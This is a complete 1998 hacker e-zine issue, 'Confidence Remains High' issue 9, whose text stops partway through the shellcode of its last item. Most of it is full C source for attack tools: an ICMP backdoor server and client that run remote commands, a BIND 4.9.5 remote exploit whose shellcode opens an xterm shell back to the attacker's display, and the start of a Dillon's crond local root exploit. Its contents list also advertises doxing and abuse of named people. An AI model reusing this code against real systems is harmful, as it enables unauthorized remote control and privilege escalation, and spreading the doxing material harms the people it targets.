Copy Link
Add to Bookmark
Report
Confidence Remains High Issue 09
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
. [cZo] . Team CodeZero Presents . [cZo] .
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
`~Y$$$$s, `~~Y$$$$$s, ;
,ss$$$$$: :$$$$$$$s, ,ss$$$$P' :$$$$$$$$s,,sss$$: `YSss,
:$$$$$$$: ,$$$$$$$P"':$$$$$$$: ,$$$$$$$$$:$$$$$$$ :$$$$$s,
$$$$$$$$ `~~~Y$P" $$$$$$$$ ,ss$$$$$$$P"' :$$$$$$$ssssss $$$$$$$$
:$$$$$$$ ,s:$$$$$$$: `~'YSss, $$$$$$$$ `~Y$$$$$$$:
$$$$$$$$ :$$$$$$$P'$$$$$$$$ :$$$$$$$s, :$$$$$$$$: :$$$$$$$$
`~Y$$$$$$: :$$$$$$$s;$$$$$$$: $$$$$$$$$P"'$$$$$$$$$ ,$$$$$$$$$:
`~~Y$$s,,s$$$$$$P' $$$$$$$$$s, :$$$$$P' :$$$$$$$$$s, `~~Y$$$$$s,
`$P"' :P"' $P' ,s$$P"'
: `~s, <mydknight>
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Issue 9
11th May 1998
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Man with the plan : so1o
The usual : om3n, zer0x, xFli, electro,
spheroid, el8, ultima, chameleon.
Not forgotten : loss, organik, peenut, pzn, suid
helix, deprave, manly, Shok.
Others : paladine, Sciri, fiji, ch-E-ztic,
vacuum, humble.
Cheers : Darkcyde, Jf.
Russians : lirik, DemiGod, stranger, ps.
Rhino9 : www.rhino9.org
.-----------[ An Official ]-----------.
: .-----. .----. .--.--. :
: : .--' : .-. : : : : :
!_-:: : : : `-' ; : . : ::-_!
:~-:: :: : :: . : :: : ::-~:
: ::.`--. ::.: : ::.: : :
: `-----' `--'--' `--'--' :
!_-:: ::-_!
:~-::-[ Confidence Remains High ]-::-~:
:~-:: ::-~:
`-----------[ Production ]------------'
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
In This (compact) Installment of Confidence Remains High :
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
------=> Section A : Introduction And Cover Story.
1. Confidence Remains High issue 9....................: Tetsu Khan
------=> Section B : Exploits And Code.
1. ICMP backdoor client and server....................: BiT
2. BIND 4.9.5 remote..................................: prym
3. flea.c.............................................: SrfRoG
4. Dillons Linux crond exploit........................: BM V
5. KDE klock local exploit............................: someone on bugtraq
------=> Section C : Phones / Scanning / Radio.
1. Wardialing in the UK...............................: Jf
------=> Section D : Miscellaneous (aka. d0x)
1. p0sse.rolodex (mad outdated anyway)................: juurigaveitout
2. RLoxley, first class fuckwit (and fatboy)..........: WH0 GN0Z?
3. Carolyn Meinel d0x.................................: savec0re
------=> Section E : World News.
1. MOD break DISN.....................................: JP
------=> Section G : FIN.
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
===============================================================================
==[ INTRO ]====================[ .SECTION A. ]======================[ INTRO ]==
===============================================================================
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
1. Confidence Remains High issue 9 : Tetsu Khan
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Blah blah blah, welcome to CRH009, you will find el8 0-day exploits and code,
as well as some semi-interesting texts on a fag called RLoxley, a cl00le$$
fuckwit called Carolyn Meinel, and some info on the MOD.. phear
The Distro List :
=================
152.7.11.38 /pub/personal/tattooman/confidence_remains_high/
ftp.sekurity.org /users/so1o/
ftp.technotronic.com /ezines/crh/
cybrids.simplenet.com /Toast/files/CRH/
ftp.linuxwarez.com /pub/crh/
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
===============================================================================
==[ EXPLOITS / CODE ]==========[ .SECTION B. ]============[ EXPLOITS / CODE ]==
===============================================================================
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
1. ICMP backdoor client and server : BiT
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
icmpd.c == server daemon
icmpc.c == client
<--icmpd.c-------------------------------------------------------------------->
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netinet/in.h>
#include <unistd.h>
#define RID 31337
#define LID 12345
#define VER "0.3"
void start_pipe(char *buf,int len);
void send_connect(unsigned long to, unsigned int id,char *data);
u_short cksum(u_short *buf, int nwords);
void main()
{
char buf[512];
struct iphdr *ip=(struct iphdr *)buf;
struct icmphdr *icmp=(struct icmphdr *)(buf+sizeof(struct iphdr));
int lsock,i;
printf("ICMP PIPE %s - DAEMON PART - BiT'97\n",VER);
if(geteuid())
printf("User luser detected\n"),exit(-1);
lsock=socket(AF_INET,SOCK_RAW,1);
close(0);close(1);close(2);
if(fork())
exit(0);
while(1)
{
i=read(lsock,buf,512);
if(ip->protocol == 1 && icmp->type == 0 && ntohs(icmp->un.echo.id) == RID)
start_pipe(buf,i);
}
}
void start_pipe(char *buf,int len)
{
char databuf[512];
FILE *haha;
struct iphdr *ip=(struct iphdr *)buf;
struct icmphdr *icmp=(struct icmphdr *)(buf+sizeof(struct iphdr));
int lsock,i;
char *p;
unsigned long int tmp;
struct sockaddr_in sa;
lsock=socket(AF_INET,SOCK_RAW,1);
icmp->un.echo.id=ntohs(LID);
sa.sin_family=AF_INET;
sa.sin_addr.s_addr=ip->saddr;
sendto(lsock,icmp,len-sizeof(struct iphdr),0,(struct sockaddr *)&sa,sizeof(sa));
/* connected */
while(1)
{
i=recv(lsock,buf,512,0);
if(ip->potocol == 1 && icmp->type == 0 && ntohs(icmp->un.echo.id) == RID) {
p=(buf+sizeof(struct iphdr)+sizeof(struct icmphdr));
memcpy(databuf,p,i-(sizeof(struct iphdr)+sizeof(struct icmphdr))+1);
if(strcasecmp(databuf,"exit") == 0)
return;
if((haha=popen(databuf,"r")) == NULL)
send_connect(ip->saddr,LID,"Unknown command.\n");
else {
i=0;
while(fgets(databuf,512,haha) != NULL) {
i++;
send_connect(ip->saddr,LID,databuf);
}
if(!i)
send_connect(ip->saddr,LID,"Unknown command.\n");
pclose(haha);
}
}
fflush(stdout);fflush(stdin);
}
}
void send_connect(unsigned long to, unsigned int id,char *data)
{
char buf[512];
struct icmphdr *icmp = (struct icmphdr *)buf;
char *bla=(buf+sizeof(struct icmphdr));
struct sockaddr_in sa;
int i,sock;
sock=socket(AF_INET,SOCK_RAW,1);
bzero(buf,512);
icmp->type=0;
icmp->un.echo.id=htons(id);
strcpy(bla,data);
icmp->checksum=cksum((u_short *)icmp,(9+strlen(data))>>1);
sa.sin_family=AF_INET;
sa.sin_addr.s_addr=to;
i=sendto(sock,buf,(9+strlen(data)),0,(struct sockaddr *)&sa,sizeof(sa));
close(sock);
}
u_short cksum(u_short *buf, int nwords) {
unsigned long sum;
for ( sum = 0; nwords > 0; nwords -- )
sum += *buf++;
sum = ( sum >> 16) + ( sum & 0xffff );
sum += ( sum >> 16 );
return ~sum ;
}
<--end of icmpd.c------------------------------------------------------------->
<-icmpc.c--------------------------------------------------------------------->
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netinet/in.h>
#include <unistd.h>
#include <fcntl.h>
#include <time.h>
#include <netdb.h>
#define LID 12345
#define VER "0.3"
unsigned int RID;
unsigned long host,myip;
int state=0;
unsigned long int res(char *p);
void send_connect(unsigned long to, unsigned int id,char *data);
void get_string_and_send(void);
void show_shit(char *buf);
u_short cksum(u_short *buf, int nwords);
void main(int argc, char **argv)
{
char buf[512];
struct iphdr *ip = (struct iphdr *)buf;
struct icmphdr *icmp = (struct icmphdr *)(buf+sizeof(struct iphdr));
int i,lsock;
fd_set f;
printf("ICMP PIPE %s - CLIENT PART - BiT'97\n",VER);
if(argc<3)
printf("%s <host> <rid>\n",*argv),exit(-1);
if(geteuid())
printf("User luser detected\n"),exit(-1);
host=res(argv[1]);
RID=atoi(argv[2]);
lsock=socket(AF_INET,SOCK_RAW,1);
send_connect(host,RID,"a");
stat e=1;
fcntl(lsock,F_SETFL,O_NONBLOCK);
fcntl(fileno(stdin),F_SETFL,O_NONBLOCK);
while(1)
{
fflush(stdout);
fflush(stdin);
FD_ZERO(&f);
FD_SET(fileno(stdin),&f);
FD_SET(lsock,&f);
if(select(FD_SETSIZE,&f,NULL,NULL,NULL))
{
if(FD_ISSET(fileno(stdin),&f))
get_string_and_send();
if(FD_ISSET(lsock,&f)) {
i=read(lsock,buf,512);
if(ip->protocol == 1 && icmp->type == 0 &&
ntohs(icmp->un.echo.id) == LID) {
if(state==2)
show_shit(buf);
if(state==1) {
state++;
printf("Connected.\n");
}
myip=ip->daddr;
}
}
}
}
}
unsigned long int res(char *p)
{
struct hostent *h;
unsigned long int rv;
h=gethostbyname(p);
if(h!=NULL)
memcpy(&rv,h->h_addr,h->h_length);
else
rv=inet_addr(p);
return rv;
}
void send_connect(unsigned long to, unsigned int id,char *data)
{
char buf[512];
struct icmphdr *icmp = (struct icmphdr *)buf;
char *bla=(buf+sizeof(struct icmphdr));
struct sockaddr_in sa;
int i,ssock;
ssock=socket(AF_INET,SOCK_RAW,1);
bzero(buf,512);
icmp->type=0;
icmp->un.echo.id=htons(id);
strcpy(bla,data);
icmp->checksum=cksum((u_short *)icmp,(9+strlen(data))>>1);
sa.sin_family=AF_INET;
sa.sin_addr.s_addr=to;
i=sendto(ssock,buf,(9+strlen(data)),0,(struct sockaddr *)&sa,sizeof(sa));
close(ssock);
}
void get_string_and_send(void)
{
char buf[512];
bzero(buf,512);
read(0,buf,512);
buf[strlen(buf)-1]=0;
send_connect(host,RID,buf);
if(strcasecmp(buf,"exit") == 0)
exit(1);
}
void show_shit(char *buf)
{
printf((buf+sizeof(struct iphdr)+sizeof(struct icmphdr)));
}
u_short cksum(u_short *buf, int nwords) {
unsigned long sum;
for ( sum = 0; nwords > 0; nwords -- )
sum += *buf++;
sum = ( sum >> 16) + ( sum & 0xffff );
sum += ( sum >> 16 );
return ~sum ;
}
<--end of icmpc.c------------------------------------------------------------->
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
2. BIND 4.9.5 remote exploit : prym
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
/*
* z, thnx.
* ganked the xterm exec from adm, thnx.
* have fun.
* -prym
*/
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <time.h>
#include <string.h>
#include <ctype.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <arpa/nameser.h>
#include <netdb.h>
#define REMOTE
#define DEFAULT_ANBUF_OFFSET 300
#define DEFAULT_TARGET 0
#define DEFAULT_OPTIMIZED 0
#define DLEN_VAL 4
#define PRE_OF_DATALEN (1+(sizeof(short)*3)+sizeof(long))
#define ALEN_VAL (DLEN_VAL+PRE_OF_DATALEN)
#define EVILSPACE (PACKETSZ-PRE_OF_DATALEN)
#define RET_FROM_1NOP (PACKETSZ+(MAXDNAME+3)+(sizeof(int)*6)+4-PRE_OF_DATALEN)
#define OPT_RET_FROM_1NOP (PACKETSZ+(MAXDNAME+3)+4-PRE_OF_DATALEN)
struct target_type
{
char desc[40];
int systype;
unsigned long addr;
unsigned long opt_addr;
};
struct target_type target[] =
{
{"x86 Linux 2.0.x named 4.9.5-P1",0,0xbfffef8c,0xbfffefb4},
{"x86 Linux 2.0.x named 4.9.6-REL",0,0xbffff188,0xbffff194},
{"x86 Linux 2.0.x named 8.1-REL",0,0xbffff3f0,0xbffff44c},
{"x86 Linux 2.0.x named 8.1.1",0,0xbffff404,0xbffff45c},
{"x86 Linux 2.0.x RH 4.2 named 4.9.5-P1",0,0,0xbfffeff8},
{{0},0,0,0}
};
unsigned long resolve(char *host)
{
long i;
struct hostent *he;
if((i=inet_addr(host))<0)
if((he=gethostbyname(host))==NULL)
return(0);
else
return(*(unsigned long *)he->h_addr);
return(i);
}
int send_packet(int fd, char *buff, int len)
{
char tmp[2], *ptr=tmp;
PUTSHORT(len,ptr);
if(write(fd,tmp,2)!=2)
return(-1);
if(write(fd,buff,len)!=len)
return(-1);
return(1);
}
int attack(int fd, struct in_addr us, struct target_type t,
unsigned long offset, int optimized)
{
char buff[sizeof(HEADER)+PRE_OF_DATALEN+RET_FROM_1NOP+4], *ptr=buff;
HEADER *dnsh=(HEADER *)buff;
unsigned long i;
int dlen, len=0, al=ALEN_VAL, dl=DLEN_VAL;
memset(dnsh,0,sizeof(HEADER));
dnsh->id = htons(31337);
dnsh->opcode = IQUERY;
dnsh->rd = 1;
dnsh->ra = 1;
dnsh->ancount = htons(1);
ptr += sizeof(HEADER);
len += sizeof(HEADER);
*ptr = '\0';
ptr++;
PUTSHORT(T_A,ptr);
PUTSHORT(C_IN,ptr);
PUTLONG(31337,ptr);
dlen = (optimized?OPT_RET_FROM_1NOP:RET_FROM_1NOP)+4;
PUTSHORT(dlen,ptr);
len += PRE_OF_DATALEN;
memset(ptr,'X',(sizeof(buff)-(ptr-buff)));
if(t.systype==0)
{
#ifdef REMOTE
char c1[] =
"\xeb\x2f\x5f\xeb\x4a\x5e\x89\xfb\x89\x3e\x89\xf2\xb0\xfe\xae\x74"
"\x14\x46\x46\x46\x46\x4f\x31\xc9\x49\xb0\xff\xf2\xae\x30\xc0\x4f"
"\xaa\x89\x3e\xeb\xe7\x31\xc0\x89\x06\x89\xd1\x31\xd2\xb0\x0b\xcd"
"\x80\xe8\xcc\xff\xff\xff";
char c2[] =
"/usr/bin/X11/xterm\xff-display\xff";
char c3[32];
char c4[] =
"\xfe\xe8\xb1\xff\xff\xff";
snprintf(c3,sizeof(c3),"%s:0\xff-e\xff/bin/sh\xff",inet_ntoa(us));
c1[4] = (unsigned char)0x32+strlen(c2)+strlen(c3);
c4[2] = (unsigned char)0xc9-strlen(c2)-strlen(c3);
i = EVILSPACE-strlen(c1)-strlen(c2)-strlen(c3)-strlen(c4);
memset(ptr,0x90,i);
memcpy((ptr+i),c1,strlen(c1));
memcpy((ptr+i+strlen(c1)),c2,strlen(c2));
memcpy((ptr+i+strlen(c1)+strlen(c2)),c3,strlen(c3));
memcpy((ptr+i+strlen(c1)+strlen(c2)+strlen(c3)),c4,strlen(c4));
#else
char c0de[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/tmp/hi";
int i = EVILSPACE-strlen(c0de);
memset(ptr,0x90,i);
memcpy((ptr+i),c0de,strlen(c0de));
#endif
}
else
return(0);
if(!optimized)
{
memcpy((ptr+(dlen-16)),&al,sizeof(al));
memcpy((ptr+(dlen-12)),&dl,sizeof(dl));
}
i = (optimized?t.opt_addr:t.addr)+offset;
memcpy((ptr+(dlen-4)),&i,sizeof(i));
len += dlen;
return(send_packet(fd,buff,len));
}
int main(int argc, char *argv[])
{
unsigned long offset=DEFAULT_ANBUF_OFFSET;
int target_index=DEFAULT_TARGET, optimized=DEFAULT_OPTIMIZED, sock, i;
struct sockaddr_in sa;
struct in_addr xs;
for(i=0;target[i].desc[0];i++);
if(argc<3)
{
fprintf(stderr,"\ntarget types:\n");
fprintf(stderr," %-2s : %-12s - %-12s - %s\n","tt","anbuf","opt anbuf",
"description");
for(target_index=0;target_index<i;target_index++)
fprintf(stderr," %-2d : 0x%-10x - 0x%-10x - %s\n",target_index,
(unsigned int)target[target_index].addr,
(unsigned int)target[target_index].opt_addr,
target[target_index].desc);
fprintf(stderr,
"\nerror: usage: %s <target> <X server> [tt] [opt] [offset]\n",
argv[0]);
exit(-1);
}
if((argc>3)&&((target_index=atoi(argv[3]))>=i))
{
fprintf(stderr,"error: invalid target type %d\n",target_index);
exit(-1);
}
if((target[target_index].addr==0)&&(target[target_index].opt_addr==0))
{
fprintf(stderr,"error: internal error\n");
exit(-1);
}
if(argc>4)
{
optimized = atoi(argv[4]);
if((optimized!=0)&&(optimized!=1))
{
fprintf(stderr,"error: invalid optimization setting %d\n",optimized);
exit(-1);
}
}
if((optimized==0)&&(target[target_index].addr==0))
optimized = 1;
if((optimized==1)&&(target[target_index].opt_addr==0))
optimized = 0;
if(argc>5)
offset = atoi(argv[5]);
if(!(xs.s_addr=resolve(argv[2])))
{
fprintf(stderr,"error: can not resolve: %s\n",argv[2]);
exit(-1);
}
if(!(sa.sin_addr.s_addr=resolve(argv[1])))
{
fprintf(stderr,"error: can not resolve: %s\n",argv[1]);
exit(-1);
}
sa.sin_family = AF_INET;
sa.sin_port = htons(53);
if((sock=socket(sa.sin_family,SOCK_STREAM,IPPROTO_TCP))==(-1))
{
perror("error: socket");
exit(-1);
}
if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))==(-1))
{
perror("error: connect");
exit(-1);
}
printf("target : %s\n",inet_ntoa(sa.sin_addr));
printf("target type : %s\n",target[target_index].desc);
printf("optimized named : %s\n",(optimized?"YES":"NO"));
printf("anbuff addr : 0x%x\n",(unsigned int)
(optimized?target[target_index].opt_addr:target[target_index].addr));
printf("anbuff addr offset : %lu\n",offset);
printf("xterm display dest : %s:0\n",inet_ntoa(xs));
printf("exploiting . . .\n");
switch(attack(sock,xs,target[target_index],offset,optimized))
{
case -1:
perror("error: attack");
return(-1);
break;
case 0:
fprintf(stderr,"error: internal error\n");
return(-1);
break;
}
if(close(sock)!=0)
{
perror("error: close");
return(-1);
}
exit(0);
}
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
3. flea.c : SrfRoG
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
/*
* flea.c : fetch stuff from the Web without launching a browser.
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
*
*/
/*
* TODO:
*
* 1) Use threads for multiple gets.
* 2) More file options.
* 3) Better output display.
* 4) Configuration file.
* 5) Host cache'ing.
* 6) HTTP/1.1 Message parsing / compliance.
* 7) MIME types handling.
*
* Email comments / suggestions to srfrog@nema.com
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <fcntl.h>
#include <unistd.h>
#include <errno.h>
#include <time.h>
#include <netdb.h>
#include <string.h>
#include <netinet/in.h>
#include <sys/time.h>
#include <sys/types.h>
#ifndef TRUE
#define TRUE 1
#define FALSE 0
#endif
#define m_isalpha(x) (((x) >= 'a' && (x) <= 'z') || ((x) >= 'A' && (x) <= 'Z'))
#define m_isdigit(x) ((x) >= '0' && (x) <= '9')
#define m_isspace(x) ((x) == ' ' || (x) == '\f' || (x) == '\n' || (x) == '\r' || (x) == '\t' || (x) == '\v')
#define MAXLEN 512
#define WIDTH 79
#define VERSION "0.9"
unsigned int serv_port(char);
/* Some variables used */
static int nofetchfile = FALSE;
static char *pn = (char *)0;
typedef struct url_entry
{
char *hostname;
unsigned int port;
char *path;
char *file;
} URL;
static void status(char *fmt, ...)
{
va_list msg;
char buf[MAXLEN], *p = buf, c;
int len;
static int old_len = 0;
va_start(msg, fmt);
vsprintf(buf, fmt, msg);
va_end(msg);
len = strlen(buf) - 1;
c = buf[len];
write(1, p, len);
if (old_len > len) {
int i, j;
char k = ' ';
for (i=0, j=(old_len - len); j > i; ++i)
write(1, &k, 1);
write(1, &c, 1);
return;
}
old_len = len;
write(1, &c, 1);
}
static int strcount(s, c)
char *s, c;
{
int index=0, count=0;
while (s[index] != '\0')
{
if (s[index] == c)
count++;
index++;
}
return(count);
}
static URL strip_url(url)
char *url;
{
int i, idx=0, skip=0;
char tmp[MAXLEN*2], *p = tmp;
URL u;
if (0 == strncmp(url,"http://",7))
idx = 7;
for (i=0; (url[idx]!=':' && url[idx]!='/' && url[idx]!='\0'); i++,idx++)
tmp[i] = url[idx];
if (i == 0)
return (u);
tmp[i] = 0;
u.hostname = strdup(p);
if (url[idx] == ':') {
++idx;
for (i=0; m_isdigit(url[idx]); i++,idx++)
tmp[i] = url[idx];
tmp[i] = 0;
u.port = (unsigned int) atoi(p);
} else
u.port = 80;
skip = strcount(&url[idx], '/');
for (i=0; skip > 0; i++,idx++)
{
tmp[i] = url[idx];
if (url[idx]=='/')
skip--;
}
tmp[i] = 0;
u.path = strdup(p);
for (i=0; url[idx]!='\0'; i++,idx++)
tmp[i] = url[idx];
tmp[i]=0;
u.file = strdup(p);
if (i == 0) {
nofetchfile = TRUE;
strcpy(p,"flea.dump");
u.file = strdup(p);
}
return (u);
}
static int connect_url(u)
URL u;
{
struct hostent *host;
struct sockaddr_in sin;
int s = -1;
if ((host = gethostbyname(u.hostname)) == NULL) {
perror(pn);
return(-1);
}
if ((s = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
perror(pn);
return(-2);
}
sin.sin_family = AF_INET;
sin.sin_port = htons(u.port);
bcopy(host->h_addr, &sin.sin_addr, host->h_length);
printf("Connecting to remote host %s:%u\n", u.hostname, u.port);
if (connect(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
perror(pn);
close(s);
return(-3);
}
return (s);
}
static void process_file(fdw, fdr, u)
int fdw, fdr;
URL *u;
{
time_t start = 0L, end = 0L;
int n, m, bytes=0;
float x=0.0;
char buffer[MAXLEN+1], *p = buffer;
time(&start);
while (1) {
n = read(fdr, p, MAXLEN);
switch (n) {
case -1:
status("%s: Read error: %s\n", u->file, strerror(errno));
break;
case 0:
time(&end);
n = (int)(end - start) + 1;
x = (float)bytes / (float)n;
x /= 1024.0;
status("%s: Received %d bytes in %d sec%s (%.3f kb/s)\n",
u->file, bytes, n, (n == 1) ? "" : "s", x);
break;
default:
m = write(fdw, p, n);
if (m > 0) {
bytes += m;
status("%s: Writing: %d bytes\r", u->file, bytes);
continue;
}
status("%s: Write error: %s\n", u->file, strerror(errno));
break;
}
break;
}
close(fdw);
close(fdr);
}
static void launch_fetcher(url)
char *url;
{
int sock = -1, i, j,
outfd = -1;
URL u;
char tmp[MAXLEN*2];
/* sanity */
if (!url)
return;
u = strip_url(url);
if (!u.hostname) {
perror(pn);
return;
}
if ((sock = connect_url(u)) < 0)
return;
if ((outfd = open(u.file, O_WRONLY | O_CREAT | O_TRUNC, 0644)) < 0) {
perror(pn);
close(sock);
return;
}
#if defined(__linux__)
i = sprintf(tmp, "GET %s%s HTTP/1.0\r\n\r\n",
u.path, (nofetchfile == FALSE)?u.file:"/");
#else
sprintf(tmp, "GET %s%s HTTP/1.0\r\n\r\n",
u.path, (nofetchfile == FALSE)?u.file:"/");
i = strlen(tmp);
#endif
if (send(sock, tmp, i, 0) < 0) {
perror(pn);
close(sock);
close(outfd);
return;
}
/* remove httpd header */
{
char c;
j=0;
while (read(sock, &c, 1)) {
tmp[j++] = c;
if (c != '\n')
continue;
if (j > 2) {
tmp[j]=0; j=0;
printf("%s: %s",u.file,tmp);
fflush(stdout);
continue;
}
break;
}
}
status("%s: Waiting for data connection...\r", u.file);
process_file(outfd, sock, &u);
}
int main(argc, argv)
int argc;
char **argv;
{
if (argc < 2) {
printf("\nflea Web fetcher v%s by SrfRoG (srfrog@nema.com)\n\n", VERSION);
puts("\
Usage: flea [http://host[:port][/][filename]]\n\n\
If no file is given, the index file or file listing\n\
is dumped to 'flea.dump'.\n\n\
Examples:\n\
\tflea http://www.cgifx.com/img/cgifx.gif\n\
\tflea http://www.cgifx.com/img/\n\
\tflea http://www.cgifx.com");
fflush(stdout);
return 1;
}
pn = argv[0];
launch_fetcher(argv[1]);
return 0;
}
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
4. Dillons Linux crond exploit : BM V
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
/* Dillon's Crond v2.2 exploit */
/* */
/* There exists a buffer overflow */
/* in Slackware's /usr/sbin/crond */
/* in the fdprintf() function from */
/* subs.c [specifically vsprintf()] */
/* Also take note that the overflow */
/* was discovered by the KSRT team. */
/* */
/* Simply compile and run this. */
/* and look for a suid root shell */
/* in /tmp (/tmp/XxX) in about one */
/* minute. Also please use this in */
/* a responsible manner. */
/* */
/* also try crondsploit 1000 */
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
#include <pwd.h>
#define DEFAULT_OFFSET 560
#define DEFAULT_BUFFER_SIZE 980
#define TOTAL_BUFFER 4096
char shellcode[]=
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07"
"\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"
"\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8"
